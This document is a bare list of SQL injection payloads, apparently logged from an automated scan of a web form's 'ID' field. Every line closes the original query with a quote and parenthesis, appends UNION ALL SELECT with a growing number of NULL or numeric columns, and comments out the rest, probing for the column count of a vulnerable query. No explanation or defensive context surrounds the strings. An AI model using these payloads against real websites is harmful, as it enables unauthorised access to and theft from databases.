ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:-2209') UNION ALL SELECT 8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393,8393#
ID:-1296') UNION ALL SELECT 2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398#
ID:-5191') UNION ALL SELECT 1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339#
ID:-9768') UNION ALL SELECT 6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048,6048#
ID:-3194') UNION ALL SELECT 8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961,8961#
ID:-9854') UNION ALL SELECT 7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074,7074#
ID:-2122') UNION ALL SELECT 4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050,4050#
ID:-9510') UNION ALL SELECT 4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352,4352#
ID:-2932') UNION ALL SELECT 2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699,2699#
ID:-7401') UNION ALL SELECT 1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049#
ID:-4892') UNION ALL SELECT 3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673,3673#
ID:-7610') UNION ALL SELECT 8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082,8082#
ID:-4235') UNION ALL SELECT 7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179,7179#
ID:-5513') UNION ALL SELECT 9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262#
ID:-1579') UNION ALL SELECT 7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849,7849#
ID:-5815') UNION ALL SELECT 4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724#
ID:-3631') UNION ALL SELECT 6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125,6125#
ID:-7149') UNION ALL SELECT 4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978,4978#
ID:-6645') UNION ALL SELECT 1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:-1532') UNION ALL SELECT 5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434,5434#
ID:-7697') UNION ALL SELECT 2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627,2627#
ID:-5413') UNION ALL SELECT 1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553,1553#
ID:-7013') UNION ALL SELECT 1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819,1819#
ID:-9915') UNION ALL SELECT 1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167,1167#
ID:-1580') UNION ALL SELECT 4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670,4670#
ID:-8252') UNION ALL SELECT 4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780#
ID:-9547') UNION ALL SELECT 9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105,9105#
ID:-4279') UNION ALL SELECT 9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498,9498#
ID:-8727') UNION ALL SELECT 9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671,9671#
ID:-7495') UNION ALL SELECT 1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513,1513#
ID:-8818') UNION ALL SELECT 3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350,3350#
ID:-4610') UNION ALL SELECT 4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831,4831#
ID:-7410') UNION ALL SELECT 1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463,1463#
ID:-1840') UNION ALL SELECT 4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370,4370#
ID:-9160') UNION ALL SELECT 5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663,5663#
ID:-3014') UNION ALL SELECT 7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628,7628#
ID:-9759') UNION ALL SELECT 7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076,7076#
ID:-7992') UNION ALL SELECT 3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285,3285#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
